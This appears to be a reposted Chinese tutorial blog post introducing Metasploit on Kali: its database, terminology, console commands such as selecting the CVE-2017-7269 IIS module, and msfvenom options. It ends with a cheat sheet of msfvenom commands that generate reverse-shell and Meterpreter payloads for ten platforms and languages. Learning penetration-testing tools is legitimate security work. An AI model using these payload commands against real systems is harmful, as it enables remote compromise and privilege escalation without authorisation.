msf系列篇章之msf的基础模块和命令,和黑客并肩作战

msf系列篇章之msf的基础模块和命令,和黑客并肩作战1 msf 的基础介绍 kali 是默认集成了 mepasploit framework 简称为 msf 不同的框架下 它有不同的模块 不同的模块之间 互相交流彼此生产输入输出的数据 第一个模块生成的数据可以给第二个或者第三个模块去直接拿来使用 原

大家好,欢迎来到IT知识分享网。

1、 msf的基础介绍

kali是默认集成了mepasploit framework,简称为msf,不同的框架下,它有不同的模块,不同的模块之间,互相交流彼此生产输入输出的数据,第一个模块生成的数据可以给第二个或者第三个模块去直接拿来使用,原因是它拿来使用的是后台有数据库,其它的版本后面也有数据库,比如说我们扫描的目标系统,扫描下来的信息,比如说开放了哪些端口,哪些信息,都会存到数据库里面,而measploit framework用的是postgresql数据库来进行存储。

早期的msf版本需要先启动数据库再启动msf

2)msf的基本机构

msf系列篇章之msf的基础模块和命令,和黑客并肩作战

3)、msf的基础操作和命令

在这里的话,我们打开kali的终端,输入msfconsole打开msf的界面,因为kali系统是自带的msf工具,执行命令之后,它这里会进行一个初始化,接着就可以看见msf的命令行界面

msf系列篇章之msf的基础模块和命令,和黑客并肩作战

4)msf中专业术语,因为在msf中,这些都是常见的专业术语,也是必要的

– Exploit,攻击工具/代码

– Payload,攻击载荷

– Shellcode

– Module,模块

– Listener,监听器

5)、常用命令

showpayloads (show 可以理解为显示的意思), 查看所有可用的渗透攻击程序代码

msf系列篇章之msf的基础模块和命令,和黑客并肩作战

show auxiliary – 查看所有可用的辅助攻击工具,然后就可以看见显示出相对应的辅助工具

msf系列篇章之msf的基础模块和命令,和黑客并肩作战

Use exploist/windows/iis/cve_2017_7269 进入相对应的模块,比如说我进入了cve_2017_7269漏洞模块,接着就可以看见它这里进入了

msf系列篇章之msf的基础模块和命令,和黑客并肩作战

show options – 查看该模块所有可用选项,比如说我们进入cve_2017_7269漏洞模块,执行攻击的话,需要配置该模块的一些选项

msf系列篇章之msf的基础模块和命令,和黑客并肩作战

show payloads – 查看该模块适用的所有载荷代码,然后就可以显示出相对应的payload

msf系列篇章之msf的基础模块和命令,和黑客并肩作战

show targets – 查看该模块适用的攻击目标类型

search ssh – 根据关键字搜索某模块,比如说我搜索ssh相对应的漏洞模块,就可以看见显示出相对应的ssh关键词的模块

msf系列篇章之msf的基础模块和命令,和黑客并肩作战

info – 显示某模块的详细信息

msf系列篇章之msf的基础模块和命令,和黑客并肩作战

bach –退出当前进行的模块

msf系列篇章之msf的基础模块和命令,和黑客并肩作战

6)msfvenom (攻击载荷生成和编码器)

主要参数:

-p payload

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

LHOST,LPORT 监听上线的主机IP和端口

-f exe 生成EXE格式

使用msfvenom -l 可以查看可以利用payload

msfvenom -l | grep windows | grep x64 | grep tcp 选择payload

7)、在Linux命令下,执行msf命令生成可执行的文件,这些文件用来反弹shell用于提权,各种可执行的脚本命令如下。

Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac:

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Python:

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash:

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl:

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

最后喜欢我文章的朋友请加圈子关注我们,私信关键词:学习。(送免费资料和优惠券)

就会自动分享给你微信号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的”SaFeMAN”。

还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/189669.html

(0)
上一篇 2025-10-04 08:33
下一篇 2025-10-04 08:45

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注微信